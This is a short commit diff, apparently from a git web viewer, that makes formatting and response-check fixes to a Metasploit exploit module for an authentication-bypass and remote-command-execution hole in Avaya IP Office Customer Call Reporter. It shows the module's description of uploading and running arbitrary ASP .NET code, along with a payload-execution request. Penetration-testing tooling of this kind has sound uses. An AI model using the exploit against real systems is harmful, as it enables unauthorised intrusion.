metadata formatting, and a little res gotcha
parent
cdf8956a10
commit
abb4bdd408
|
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution',
|
||||
'Name' => 'Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an authentication bypass vulnerability on Avaya IP Office
|
||||
Customer Call Reporter, which allows a remote user to upload arbitrary files
|
||||
|
@ -24,10 +24,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
arbitrary ASP .NET code. The vulnerability has been tested successfully on Avaya IP
|
||||
Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2.
|
||||
},
|
||||
'Author' => [
|
||||
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'References' =>
|
||||
[
|
||||
|
@ -173,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'method' => 'GET'
|
||||
}, 20)
|
||||
|
||||
if (!res or res.code != 200)
|
||||
if (!res or (res and res.code != 200))
|
||||
print_error("#{@peer} - Execution failed on #{payload_url} [No Response]")
|
||||
return
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue